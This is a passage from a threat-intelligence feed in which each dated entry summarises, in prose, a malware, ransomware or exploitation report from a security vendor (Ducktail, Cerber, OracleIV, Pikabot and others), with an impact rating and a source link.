Impact:
LOW
Summary:
The Ducktail malware, active since 2021 and targeting Facebook business accounts, has been the focus of a recent campaign between March and October 2023, specifically targeting marketing professionals. This new version, written in Delphi, spreads via emails containing archives with images of new products and a malicious executable disguised as a PDF. The malware installs a browser extension that steals Facebook business and ad accounts. It manipulates browser shortcuts for Chromium-based browsers and uses AES encryption for some of its strings. The extension, disguised as Google Docs Offline, targets Facebook-related URLs to steal cookies and account details, potentially bypassing two-factor authentication using Facebook API requests and the 2fa.live service.
Source: https://securelist.com/ducktail-fashion-week/111017/
2023-11-14
Cerber_Ransomware_Exploits_Atlassian_Confluence_Vulnerability_CVE_23_2251
LOW
Intel Source:
TrendMicro
Intel Name:
Cerber_Ransomware_Exploits_Atlassian_Confluence_Vulnerability_CVE_23_2251
Date of Scan:
2023-11-14
Impact:
LOW
Summary:
On October 31, 2023, Atlassian announced CVE-2023-22518, an improper authorization vulnerability in Confluence Data Center and Server, allowing unauthorized creation of admin accounts. The vulnerability's proof-of-concept was publicly leaked soon after. Researchers noted that Cerber ransomware is exploiting this vulnerability, reminiscent of Cerber's 2021 attacks on Atlassian's GitLab servers. The attack involves using a PowerShell command to download and execute a remote payload, connecting to a command-and-control server, and decrypting a text file to reveal the Cerber ransomware payload. This payload encrypts files and appends the ".L0CK3D" extension, also dropping a ransom note in all directories. The new Cerber variant has slight differences from older ones, indicating an evolution of the ransomware's techniques.
Source: https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html
2023-11-14
OracleIV_A_Dockerised_DDoS_Botnet
MEDIUM
Intel Source:
Cado Security
Intel Name:
OracleIV_A_Dockerised_DDoS_Botnet
Date of Scan:
2023-11-14
Impact:
MEDIUM
Summary:
OracleIV is a Dockerized Distributed Denial of Service (DDoS) botnet. This malware targets publicly exposed Docker Engine API instances, exploiting misconfigurations to deliver a malicious Docker container. The container, named "oracleiv_latest," contains Python malware compiled as an ELF executable, capable of performing various DoS attacks. Attackers initiate access through an HTTP POST request to Docker's API, pulling the malicious image from Docker Hub. The malware connects to a Command and Control server for instructions, using novel authentication methods.
Source: https://www.cadosecurity.com/oracleiv-a-dockerised-ddos-botnet/
2023-11-14
BiBi_Wiper
LOW
Intel Source:
Blackberry
Intel Name:
BiBi_Wiper
Date of Scan:
2023-11-14
Impact:
LOW
Summary:
BiBi Wiper is a malware family originally targeting Linux systems and now adapted to run on Windows. This malware is designed to cause data destruction without leaving a ransom note or using command-and-control servers. Its name, "BiBi," references the nickname of Israeli Prime Minister Benjamin Netanyahu and is hardcoded into the malware. The Windows version of BiBi Wiper employs techniques to maximize damage, including running multiple threads and targeting specific file types for destruction while sparing essential system files. As the conflict continues, the use of such wipers in cyber warfare is expected to increase, highlighting the intertwining of physical and cyber conflicts.
Source: https://blogs.blackberry.com/en/2023/11/bibi-wiper-used-in-the-israel-hamas-war-now-runs-on-windows
2023-11-14
Atom_Keylogger
LOW
Intel Source:
Security Boulevard
Intel Name:
Atom_Keylogger
Date of Scan:
2023-11-14
Impact:
LOW
Summary:
Atom Keylogger is a budget-friendly and user-friendly malware aimed at aspiring cybercriminals. Sold on cybercrime forums for around $15 and payable through cryptocurrencies like Bitcoin, it is designed to secretly record keystrokes and other user activities on infected computers. This functionality enables the theft of sensitive information such as passwords, credit card numbers, and personal data. Atom Keylogger's low cost, ease of use, and stealthy capabilities make it a significant threat in the cybercrime landscape, allowing even unskilled individuals to engage in cybercrime and identity theft.
Source: https://securityboulevard.com/2023/11/atom-keylogger-the-budget-friendly-malware-for-aspiring-cybercriminals/
2023-11-14
Royal_Ransomware_November2023
HIGH
Intel Source:
CISA
Intel Name:
Royal_Ransomware_November2023
Date of Scan:
2023-11-14
Impact:
HIGH
Summary:
Since September 2022, Royal has targeted over 350 known victims worldwide and ransomware demands have exceeded 275 million USD. Royal conducts data exfiltration and extortion prior to encryption and then publishes victim data to a leak site if a ransom is not paid. Phishing emails are among the most successful vectors for initial access by Royal threat actors. There are indications that Royal may be preparing for a re-branding effort and/or a spinoff variant. Blacksuit ransomware shares a number of identified coding characteristics similar to Royal. A previous joint CSA for Royal ransomware was published on March 2, 2023. This joint CSA provides updated IOCs identified through FBI investigations.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
2023-11-13
SystemBC_Coroxy_DroxiDat
MEDIUM
Intel Source:
Rexorvc0
Intel Name:
SystemBC_Coroxy_DroxiDat
Date of Scan:
2023-11-13
Impact:
MEDIUM
Summary:
SystemBC is a versatile malware known as Coroxy or DroxiDat, which functions as proxy malware, a bot, a backdoor, and even a Remote Access Trojan (RAT). Active since 2018, it's popular in underground markets and is used by various threat actors for different purposes, including reconnaissance, lateral movement, and deploying additional malware. SystemBC typically gathers system and user information, establishes persistence, and creates a Socks5 connection with a Command and Control server. Various groups have used SystemBC, many linked to ransomware activities.
Source: https://rexorvc0.com/2023/11/12/Swiss-Knife-SystemBC-Coroxy/
2023-11-13
Hive_Ransomware_Offspring
MEDIUM
Intel Source:
Bitdefender
Intel Name:
Hive_Ransomware_Offspring
Date of Scan:
2023-11-13
Impact:
MEDIUM
Summary:
The recent emergence of Hunters International, a new ransomware group, follows the FBI-led dismantlement of Hive, a notorious ransomware collective. Despite Hive's shutdown and the FBI's efforts to mitigate damage by distributing decryption keys, this new group appears to have adopted Hive's assets and technology. Hunters International distinguishes itself by focusing more on data exfiltration rather than encryption, and has simplified its ransomware code, now written in Rust, a language favored for its security features. Their approach reflects the evolving landscape of cyber threats, highlighting the persistence and adaptability of such groups in the face of law enforcement actions.
Source: https://www.bitdefender.com/blog/businessinsights/hive-ransomwares-offspring-hunters-international-takes-the-stage/
2023-11-10
MuddyC2Go_Latest_C2_Framework_Used_by_Iranian_APT_MuddyWater_Spotted_in_Israel
MEDIUM
Intel Source:
Deep Instinct
Intel Name:
MuddyC2Go_Latest_C2_Framework_Used_by_Iranian_APT_MuddyWater_Spotted_in_Israel
Date of Scan:
2023-11-10
Impact:
MEDIUM
Summary:
The Deep Instinct Threat Research team has discovered a new Command and Control (C2) framework named MuddyC2Go, believed to be used by the Iranian APT group MuddyWater since at least 2020. This framework, written in Go, is a shift from their previous tool, PhonyC2. MuddyWater's typical tactics involve spear-phishing to deliver malware. Recent changes include password-protected archives to evade detection and executables that connect directly to the C2, bypassing the need for manual script execution. Instances of MuddyC2Go usage were observed in various Middle Eastern countries with specific targeting of Israeli entities. Attribution to MuddyWater is based on past activities, IP address analysis, and unique URL patterns, with known servers hosted by a VPS provider associated with malicious activities. Deep Instinct recommends disabling PowerShell if not needed or monitoring its activity closely due to MuddyWater's reliance on PowerShell payloads.
Source: https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel
2023-11-10
IMPERIAL_KITTEN_Deploys_Novel_Malware_Families_in_Middle_East_Focused_Operations
MEDIUM
Intel Source:
Crowdstrike
Intel Name:
IMPERIAL_KITTEN_Deploys_Novel_Malware_Families_in_Middle_East_Focused_Operations
Date of Scan:
2023-11-10
Impact:
MEDIUM
Summary:
The CrowdStrike blog describes IMPERIAL KITTEN, an Iran-nexus adversary with ties to the Islamic Revolutionary Guard Corps, deploying novel malware families in cyberattacks targeting the Middle East, specifically transportation, logistics, and technology sectors in October 2023. The group uses tactics like public scanning tools, exploits, and stolen VPN credentials for access; employs PAExec and credential theft for lateral movement; and utilizes custom malware for data exfiltration. Malware like IMAPLoader, StandardKeyboard, and a Python reverse shell delivered via Excel documents are highlighted. IMPERIAL KITTEN's activity is characterized by social engineering with a focus on Israeli organizations, and the blog provides a detailed analysis of the group's tooling and methods.
Source: https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/
2023-11-10
Code_Injection_Examples_in_Visual_Form
LOW
Intel Source:
ISC.SANS
Intel Name:
Code_Injection_Examples_in_Visual_Form
Date of Scan:
2023-11-10
Impact:
LOW
Summary:
Code injection techniques (such as MITRE ATT&CK T1055) are frequently used today, since they let an attacker conceal malicious code inside a legitimate process. One variation on this method is "Process Hollowing," in which the code of a legitimate process, started in a suspended state, is replaced with malicious code. Code injection is typically performed by calling Microsoft API functions such as VirtualAllocEx(), NtUnmapViewOfSection(), and WriteProcessMemory().
Source: https://isc.sans.edu/diary/Visual+Examples+of+Code+Injection/30388/
2023-11-10
Adversaries_exploit_Confluence_vulnerability_to_deploy_ransomware
MEDIUM
Intel Source:
Red Canary
Intel Name:
Adversaries_exploit_Confluence_vulnerability_to_deploy_ransomware
Date of Scan:
2023-11-10
Impact:
MEDIUM
Summary:
Red Canary reported the exploitation of Atlassian Confluence CVE-2023-22518, leading to attempts to deploy Cerber ransomware. The vulnerability allows unauthenticated users to upload a .zip file to Confluence instances, enabling data destruction or remote code execution. Red Canary suggests updating Confluence to the versions specified by Atlassian to mitigate the risk. The observed attack involved uploading a web shell, running reconnaissance commands, and executing encoded PowerShell to download ransomware.
Source: https://redcanary.com/blog/confluence-exploit-ransomware/
2023-11-10
SysAid_On_Prem_Software_CVE_2023_47246_Vulnerability
LOW
Intel Source:
SysAid
Intel Name:
SysAid_On_Prem_Software_CVE_2023_47246_Vulnerability
Date of Scan:
2023-11-10
Impact:
LOW
Summary:
A vulnerability was identified in SysAid's on-premises software, leading to an immediate response and communication with customers to implement a mitigation solution. The zero-day vulnerability allowed the Lace Tempest group to execute code and deploy the GraceWire trojan via a WebShell. Users are urged to update SysAid systems to version 23.3.36 and perform a network compromise assessment. The attack involved path traversal, PowerShell scripts to launch malware and erase evidence, and the use of a CobaltStrike agent.
Source: https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
2023-11-10
How_Kopeechka_an_Automated_Social_Media_Accounts_Creation_Service_Can_Facilitate_Cybercrime
LOW
Intel Source:
TrendMicro
Intel Name:
How_Kopeechka_an_Automated_Social_Media_Accounts_Creation_Service_Can_Facilitate_Cybercrime
Date of Scan:
2023-11-10
Impact:
LOW
Summary:
Kopeechka is a service active since 2019, facilitating automated registration of social media accounts by bypassing email verification and CAPTCHAs. It offers temporary access to emails for account confirmation without providing actual mailbox access, enabling the creation of accounts on various platforms. Kopeechka also provides integration with online SMS services for phone verification. This service, while not illegal, supports large-scale cybercrime activities such as spamming and misinformation by allowing the creation of numerous accounts quickly and inexpensively. The emergence of such services underscores the professionalization of cybercrime and the need for stronger security measures by social media platforms.
Source: https://www.trendmicro.com/en_us/research/23/j/how-kopeechka--an-automated-social-media-accounts-creation-servi.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=1023_kpeechka
2023-11-10
Hackers_Harvesting_Credentials_Using_File_Sharing_Services_and_Reverse_Proxies
LOW
Intel Source:
TrendMicro
Intel Name:
Hackers_Harvesting_Credentials_Using_File_Sharing_Services_and_Reverse_Proxies
Date of Scan:
2023-11-10
Impact:
LOW
Summary:
Researchers at Trend Micro have examined a phishing campaign whose malicious emails link to a file-sharing service. A second link in the email takes users to a PDF document that contains a further link intended to capture login credentials and session cookies.
Source: https://www.trendmicro.com/en_us/research/23/k/threat-actors-leverage-file-sharing-service-and-reverse-proxies.html
2023-11-10
EleKtra_Leak_Tracking_Malicious_Operations_of_Exposed_IAM_Keys
LOW
Intel Source:
Unit 42
Intel Name:
EleKtra_Leak_Tracking_Malicious_Operations_of_Exposed_IAM_Keys
Date of Scan:
2023-11-10
Impact:
LOW
Summary:
Unit 42 researchers have uncovered an active campaign named EleKtra-Leak which targets exposed IAM credentials within public GitHub repositories. The campaign, believed to be ongoing for at least two years, involves creating AWS EC2 instances for cryptojacking operations. The threat actors can exploit exposed credentials within five minutes of their appearance on GitHub.
Source: https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/
2023-11-10
Spammers_abuse_Google_Forms_quiz_to_deliver_scams
LOW
Intel Source:
Cisco Talos
Intel Name:
Spammers_abuse_Google_Forms_quiz_to_deliver_scams
Date of Scan:
2023-11-10
Impact:
LOW
Summary:
Cisco Talos has recently observed an increase in spam messages abusing a feature of quizzes created within Google Forms. In particular, spammers have discovered that they can create a new quiz in Google Forms, use the victim’s email address to respond to the quiz, and then abuse the “Release Scores” feature of the Google Form to deliver their spam to the victim. Because the spam messages emanate from Google itself, the messages have a good chance of landing in the victim’s inbox.
Source: https://blog.talosintelligence.com/google-forms-quiz-spam/
2023-11-09
Adversary_Using_Fake_PC_News_Website_to_Spread_Information_Stealers
LOW
Intel Source:
Malwarebytes
Intel Name:
Adversary_Using_Fake_PC_News_Website_to_Spread_Information_Stealers
Date of Scan:
2023-11-09
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered that a threat actor is replicating WindowsReport.com, a reputable Windows news page, in order to propagate a malicious installer for CPU-Z, a well-known processor tool.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/malvertiser-copies-pc-news-site-to-deliver-infostealer
2023-11-09
The_Pikabot_malware_activity
MEDIUM
Intel Source:
Twitter, GitHub, Abuse.ch, Palo Alto
Intel Name:
The_Pikabot_malware_activity
Date of Scan:
2023-11-09
Impact:
MEDIUM
Summary:
Palo Alto Unit 42 researchers, like many others this week, observed Pikabot malware being spread by TA577. They and others collected indicators of compromise (IOCs) from the last couple of days of infection activity. TA577 is a threat actor acting as an initial access broker (IAB) for ransomware and targeting western organisations; the observed lures are URLs leading to a password-protected zip (password H17) containing a JavaScript file that uses cURL to run PikaBot.
Source: https://twitter.com/threatinsight/status/1721983400611864640 https://bazaar.abuse.ch/browse/signature/pikabot/ https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2023-11-02-IOCs-for-TA577-Pikabot-activity.txt https://github.com/threatlabz/iocs/blob/main/pikabot/c2s_20231102.txt https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_02.11.2023.txt https://www.agid.gov.it/it/agenzia/stampa-e-comunicazione/notizie/2023/10/31/attenzione-al-malware-pikabot-false-mail-comunicano-enti-lavvenuta-federazione-spid
2023-11-09
BlazeStealer_Malware_Found_in_Python_Packages_on_PyPI
LOW
Intel Source:
Checkmarx
Intel Name:
BlazeStealer_Malware_Found_in_Python_Packages_on_PyPI
Date of Scan:
2023-11-09
Impact:
LOW
Summary:
The ultimate goal of a fresh batch of malicious Python packages that have made their way into the Python Package Index (PyPI) repository is to steal private data from developer systems that have been breached. The packages contain malware known as BlazeStealer, while appearing to be harmless obfuscation tools.
Source: https://checkmarx.com/blog/python-obfuscation-traps/?
2023-11-09
Project_File_Example_for_Phishing_Campaign
LOW
Intel Source:
ISC.SANS
Intel Name:
Project_File_Example_for_Phishing_Campaign
Date of Scan:
2023-11-09
Impact:
LOW
Summary:
ISC.SANS researchers have discovered an interesting file on VT. Because the file included a reference to one of their customers' domains, it set off one of their hunting rules. They looked at the "EwoExcel (1).mmp" file. Though it was made in 2022, the file was only just uploaded to VT. These kinds of files are handled by a program known as "GammaDyne", which can open the file and extract its secrets. It includes information on a well-known phishing campaign project.
Source: https://isc.sans.edu/diary/Example+of+Phishing+Campaign+Project+File/30384
2023-11-09
Distribution_of_LockBit_Ransomware_and_Vidar_Infostealer
MEDIUM
Intel Source:
ASEC
Intel Name:
Distribution_of_LockBit_Ransomware_and_Vidar_Infostealer
Date of Scan:
2023-11-09
Impact:
MEDIUM
Summary:
One of the primary ways the LockBit ransomware spreads is through the use of resume impersonation. In February of this year, information on this was posted on the ASEC Blog. It has been verified that the most recent deployments also contain an Infostealer, as opposed to earlier ones that simply contained the LockBit ransomware.
Source: https://asec.ahnlab.com/en/58750/
2023-11-09
Ukraine_Power_Grid_Downed_by_Sandworms
MEDIUM
Intel Source:
Mandiant
Intel Name:
Ukraine_Power_Grid_Downed_by_Sandworms
Date of Scan:
2023-11-09
Impact:
MEDIUM
Summary:
The notorious Russian advanced persistent threat (APT) group Sandworm employed living-off-the-land (LotL) tactics to cause a power outage in a Ukrainian city in October 2022, which was followed by a flurry of missile strikes.
Source: https://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology
2023-11-09
Chinese_APT_Attacks_Government_of_Cambodia
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Chinese_APT_Attacks_Government_of_Cambodia
Date of Scan:
2023-11-09
Impact:
MEDIUM
Summary:
Researchers from Palo Alto have discovered malicious Chinese APT infrastructure that poses as cloud backup services. While monitoring telemetry linked to two well-known Chinese APT groups, they saw network connections mostly coming from Cambodia. These included inbound connections from at least 24 government entities in Cambodia.
Source: https://unit42.paloaltonetworks.com/chinese-apt-linked-to-cambodia-government-attacks/
2023-11-09
An_Infostealer_Powered_by_ChatGPT_Aims_at_Cloud_Platforms
LOW
Intel Source:
SentinelOne
Intel Name:
An_Infostealer_Powered_by_ChatGPT_Aims_at_Cloud_Platforms
Date of Scan:
2023-11-09
Impact:
LOW
Summary:
Researchers at SentinelLabs have discovered a brand-new infostealer and hacking tool named "Predator AI" that targets cloud services and is based on Python. To improve the tool's usability and provide a unified text-driven interface for various functions, the Predator AI developer incorporated a ChatGPT-driven class into the Python script.
Source: https://www.sentinelone.com/labs/predator-ai-chatgpt-powered-infostealer-takes-aim-at-cloud-platforms/
2023-11-09
Notification_Regarding_Phobos_Ransomware
LOW
Intel Source:
ASEC
Intel Name:
Notification_Regarding_Phobos_Ransomware
Date of Scan:
2023-11-09
Impact:
LOW
Summary:
Researchers from ASEC have found that the Phobos ransomware is still operational. Phobos is a variant well known for its operational and technical parallels to both the Dharma and CrySis malware families. These ransomware strains typically use insecurely configured Remote Desktop Protocol (RDP) services exposed to the internet as their attack vector. Administrators are advised to exercise caution, since ransomware distribution frequently uses these vulnerable RDP services as the initial point of entry.
Source: https://asec.ahnlab.com/en/58753/
2023-11-09
A_Look_at_Its_Function_in_Distribution_of_Malware
LOW
Intel Source:
Seqrite
Intel Name:
A_Look_at_Its_Function_in_Distribution_of_Malware
Date of Scan:
2023-11-09
Impact:
LOW
Summary:
Researchers from Seqrite have seen a batloader being used to deliver Agent Tesla. It is not exclusive to this particular malware strain, though: this batloader has also regularly been observed aiding the injection of other malware families. Even if the code differs slightly, the fundamental process is very consistent.
Source: https://www.seqrite.com/blog/casting-light-on-batloader-an-insight-into-its-role-in-malware-delivery/
2023-11-08
New_Gootloader_Variant_GootBot
LOW
Intel Source:
SOC Radar
Intel Name:
New_Gootloader_Variant_GootBot
Date of Scan:
2023-11-08
Impact:
LOW
Summary:
SOCRadar researchers have discovered a new Gootloader malware version called "GootBot," which is utilized in SEO poisoning campaigns. This version adds capabilities that make it harder for enterprises to identify or stop threat actors from moving laterally within compromised systems.
Source: https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/
2023-11-08
New_macOS_malware_used_by_North_Korean_hackers
MEDIUM
Intel Source:
Jamf, Security Week
Intel Name:
New_macOS_malware_used_by_North_Korean_hackers
Date of Scan:
2023-11-08
Impact:
MEDIUM
Summary:
Security firm Jamf has reported a new macOS malware suspected of being used by North Korean hackers to target crypto exchanges. The group responsible for the malware is suspected to be the same group behind the recently reported KandyKorn malware.
Source: https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ https://www.securityweek.com/new-macos-malware-linked-to-north-korean-hackers/
2023-11-08
From_Combating_ISIS_to_Potentially_Using_RaaS_to_Target_Israel
LOW
Intel Source:
Uptycs
Intel Name:
From_Combating_ISIS_to_Potentially_Using_RaaS_to_Target_Israel
Date of Scan:
2023-11-08
Impact:
LOW
Summary:
GhostLocker, a novel ransomware-as-a-service (RaaS) infrastructure, was disclosed by the hacking organization GhostSec. Through a dedicated Telegram channel, they offer customers interested in purchasing this service extensive guidance. GhostSec is currently concentrating its attacks on Israel. This action is an unexpected divergence from their prior endeavors and declared goals.
Source: https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec
2023-11-08
A_new_threat_the_Millenium_RAT_details
LOW
Intel Source:
Cyfirma
Intel Name:
A_new_threat_the_Millenium_RAT_details
Date of Scan:
2023-11-08
Impact:
LOW
Summary:
The Cyfirma team observed a new RAT on GitHub, available for purchase. The analysts shared their in-depth investigation report on Millenium-RAT version 2.4, a Win32 executable built on .NET. At the same time, the RAT is actively under development, with a new version, 2.5, just released.
Source: https://www.cyfirma.com/outofband/unveiling-a-new-threat-the-millenium-rat/
2023-11-08
An_infection_by_the_NetWire_RAT
LOW
Intel Source:
Esentire
Intel Name:
An_infection_by_the_NetWire_RAT
Date of Scan:
2023-11-08
Impact:
LOW
Summary:
In September 2023, eSentire threat researchers discovered and prevented an infection by the NetWire RAT. NetWire is a publicly available remote administration tool with password-stealing and keylogging capabilities.
Source: https://www.esentire.com/blog/netwire-rat-the-stealthy-invasion-via-frenchy-shellcode
2023-11-08
SWAT_USA_Drop_Service_Exposed
LOW
Intel Source:
Krebsonsecurity
Intel Name:
SWAT_USA_Drop_Service_Exposed
Date of Scan:
2023-11-08
Impact:
LOW
Summary:
Researchers from KrebsonSecurity have identified SWAT USA Drop Service. Based in Russia, this organization employs more than 1,200 individuals across the United States to reship stolen merchandise acquired with pilfered credit card information.
Source: https://krebsonsecurity.com/2023/11/russian-reshipping-service-swat-usa-drop-exposed/
2023-11-08
A_deeper_dive_into_the_D0nut_extortion_group
LOW
Intel Source:
nccgroup
Intel Name:
A_deeper_dive_into_the_D0nut_extortion_group
Date of Scan:
2023-11-08
Impact:
LOW
Summary:
NCC Group took a deeper look at the D0nut extortion group. The D0nut extortion group was first seen last year breaking into networks and demanding money in return for not leaking stolen data. There are also suspected ties between D0nut affiliates and both the Hive and Ragnar Locker ransomware operations.
Source: https://research.nccgroup.com/2023/11/06/d0nut-encrypt-me-i-have-a-wife-and-no-backups/
2023-11-08
A_Journey_From_DarkGate_to_DanaBot
LOW
Intel Source:
Esentire
Intel Name:
A_Journey_From_DarkGate_to_DanaBot
Date of Scan:
2023-11-08
Impact:
LOW
Summary:
Early in June 2023, a Russian-speaking hacking site first advertised the sale of DarkGate, a loader developed in Borland Delphi. According to the loader developer, they started working on the project in 2017. Among the many functions offered by DarkGate are hVNC, hAnyDesk, rootkit, reverse proxy, keylogger, crypto mining, credentials theft, and remote desktop. The cost of the loader is $1,000 for a single use and $15,000 for recurring use.
Source: https://www.esentire.com/blog/from-darkgate-to-danabot
2023-11-07
Hive0051s_Large_Scale_Malicious_Operations
MEDIUM
Intel Source:
Security Intelligence
Intel Name:
Hive0051s_Large_Scale_Malicious_Operations
Date of Scan:
2023-11-07
Impact:
MEDIUM
Summary:
Last month, IBM X-Force started to see a huge spike in Hive0051's activity, with a new multi-channel approach of rapidly rotating C2 infrastructure: at least 1,027 active infections and more than 327 unique malicious domains were observed in a 24-hour period.
Source: https://securityintelligence.com/x-force/hive0051-malicious-operations-enabled-dns-fluxing/
2023-11-07
Good_Day_ransomware_of_the_week
MEDIUM
Intel Source:
Cyfirma
Intel Name:
Good_Day_ransomware_of_the_week
Date of Scan:
2023-11-07
Impact:
MEDIUM
Summary:
CYFIRMA researchers have discovered a ransomware known as Good Day ransomware while monitoring various underground forums as part of their Threat Discovery Process.
Source: https://www.cyfirma.com/news/weekly-intelligence-report-03-nov-2023/
2023-11-07
A_new_open_source_stealer_named_Trap_Stealer
LOW
Intel Source:
Cyble
Intel Name:
A_new_open_source_stealer_named_Trap_Stealer
Date of Scan:
2023-11-07
Impact:
LOW
Summary:
Cyble researchers shared their deep insights about a new info stealer known as “Trap Stealer” – an open-source Python-based program. The developer of this stealer claims that it is designed to extract a wide range of sensitive data from compromised systems in just 6 seconds.
Source: https://cyble.com/blog/new-open-source-trap-stealer-pilfers-data-in-just-6-seconds/
2023-11-07
SideCopy_s_multi_platform_attacks
MEDIUM
Intel Source:
Seqrite
Intel Name:
SideCopy_s_multi_platform_attacks
Date of Scan:
2023-11-07
Impact:
MEDIUM
Summary:
SEQRITE Labs APT-Team has observed multiple campaigns by APT SideCopy attacking Indian government and defense entities over the last couple of months. The threat group is now exploiting the recent WinRAR vulnerability CVE-2023-38831 to deploy AllaKore RAT, DRat and additional payloads.
Source: https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/
2023-11-07
Malicious_PDF_files_analysis
LOW
Intel Source:
Intezer
Intel Name:
Malicious_PDF_files_analysis
Date of Scan:
2023-11-07
Impact:
LOW
Summary:
Intezer analysts described the PDF format and how it can be abused to deliver malware. They then showed how a malicious PDF file can be identified and detected using open-source and free tools.
Source: https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/
2023-11-07
An_Overview_of_BlackSuit_Ransomware
MEDIUM
Intel Source:
HC3
Intel Name:
An_Overview_of_BlackSuit_Ransomware
Date of Scan:
2023-11-07
Impact:
MEDIUM
Summary:
Given its striking resemblance to the Royal ransomware family, BlackSuit, a relatively new ransomware group and strain, is expected to pose a serious danger to the Healthcare and Public Health (HPH) industry. Sensitive data on a vulnerable network is stolen and encrypted by BlackSuit utilizing a double extortion technique. It has only been used specifically in a few instances thus far.
Source: https://www.hhs.gov/sites/default/files/blacksuit-ransomware-analyst-note-tlpclear.pdf
2023-11-07
A_Jupyter_Infostealer_Update
MEDIUM
Intel Source:
VMware
Intel Name:
A_Jupyter_Infostealer_Update
Date of Scan:
2023-11-07
Impact:
MEDIUM
Summary:
New Jupyter Infostealer iterations persist in developing, incorporating minor yet significant modifications to the malware creator's methods. With this innovation, the attacker can more covertly compromise victims by avoiding detection and establishing persistence.
Source: https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html
2023-11-07
Agonizing_Serpens_attacks_on_the_Israeli_organizations
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Agonizing_Serpens_attacks_on_the_Israeli_organizations
Date of Scan:
2023-11-07
Impact:
MEDIUM
Summary:
Unit 42 researchers have analyzed recent attacks from last month targeting the education and technology sectors in Israel. The attacks attempted to steal sensitive data, such as personally identifiable information (PII) and intellectual property. Unit 42's investigation showed that the perpetrators of the attacks are linked to an Iranian-backed APT group that Unit 42 tracks as Agonizing Serpens (aka Agrius, BlackShadow, Pink Sandstorm, DEV-0022).
Source: https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/
2023-11-06
Revealing_the_AsyncRAT_New_Infection_Network
LOW
Intel Source:
McAfee
Intel Name:
Revealing_the_AsyncRAT_New_Infection_Network
Date of Scan:
2023-11-06
Impact:
LOW
Summary:
Researchers at McAfee have seen that a malicious HTML file is being used to spread a recent AsyncRAT campaign. VBScript (VBS), Windows Script File (WSF), PowerShell, and other file formats are used throughout this entire infection method to evade antivirus detection.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/unmasking-asyncrat-new-infection-chain/
2023-11-06
Kinsing_Actors_Breach_Cloud_Environments_by_Using_New_Linux_Flaw
LOW
Intel Source:
Aquasec
Intel Name:
Kinsing_Actors_Breach_Cloud_Environments_by_Using_New_Linux_Flaw
Date of Scan:
2023-11-06
Impact:
LOW
Summary:
Aqua Nautilus researchers have intercepted Kinsing's experimental forays into cloud environments. Through a basic yet typical PHPUnit vulnerability exploit attack, part of Kinsing's ongoing campaign, they uncovered the threat actor's manual attempts to exploit the Looney Tunables vulnerability (CVE-2023-4911).
Source: https://blog.aquasec.com/loony-tunables-vulnerability-exploited-by-kinsing
2023-11-03
A_Novel_Loading_Method_Employed_by_New_DarkGate_Variant
LOW
Intel Source:
Netskope
Intel Name:
A_Novel_Loading_Method_Employed_by_New_DarkGate_Variant
Date of Scan:
2023-11-03
Impact:
LOW
Summary:
Recently, a new DarkGate variant distributed via MSI that uses a loading technique based on the default shellcode stub of Cobalt Strike Beacon was discovered by Netskope Threat Labs. By comparing the results of their analysis with those of other researchers, they were able to conclude that this is a new variant of the DarkGate malware.
Source: https://www.netskope.com/jp/blog/new-darkgate-variant-uses-a-new-loading-approach
2023-11-03
A_Synopsis_of_Blisters_Malware
LOW
Intel Source:
NCC Group
Intel Name:
A_Synopsis_of_Blisters_Malware
Date of Scan:
2023-11-03
Impact:
LOW
Summary:
In the past, Blister, a loader with an integrated payload, was seen engaging in activities connected to Evil Corp. Researchers have also observed it as a follow-up payload in SocGholish infections, in line with public reporting. Previously, they saw Blister mostly dropping Cobalt Strike beacons, but recent events indicate a change to Mythic agents, another red teaming framework.
Source: https://research.nccgroup.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/
2023-11-03
Exposing_Socks5Systemz
LOW
Intel Source:
BitSight
Intel Name:
Exposing_Socks5Systemz
Date of Scan:
2023-11-03
Impact:
LOW
Summary:
Researchers from Bitsight have discovered a proxy botnet that is being delivered using two loaders that threat actors commonly use to spread malware and construct botnets: PrivateLoader and Amadey. The malware known as a proxy bot has been dubbed Socks5Systemz, which is also the name of the special login window that is always present in all of the current C2 proxy bots.
Source: https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey
2023-11-03
New_Java_Based_Sayler_RAT_Targeting_Polish_Speaking_Users
LOW
Intel Source:
Cyble
Intel Name:
New_Java_Based_Sayler_RAT_Targeting_Polish_Speaking_Users
Date of Scan:
2023-11-03
Impact:
LOW
Summary:
Researchers from Cyble discovered a Java Archive (JAR) file on VirusTotal that had zero detections. After further investigation, they were able to identify the file as a Remote Access Trojan (RAT), which they named "Sayler."
Source: https://cyble.com/blog/new-java-based-sayler-rat-targets-polish-speaking-users/
2023-11-03
Analyzing_the_8Base_Ransomware_Threat
MEDIUM
Intel Source:
HC3
Intel Name:
Analyzing_the_8Base_Ransomware_Threat
Date of Scan:
2023-11-03
Impact:
MEDIUM
Summary:
The "8Base Ransomware Threat Analysis - HC3 Analyst Note" is a report from the U.S. Department of Health and Human Services (HHS). It discusses the emerging threat posed by the 8Base ransomware gang, focusing on its recent activities in the Healthcare and Public Health (HPH) sector.
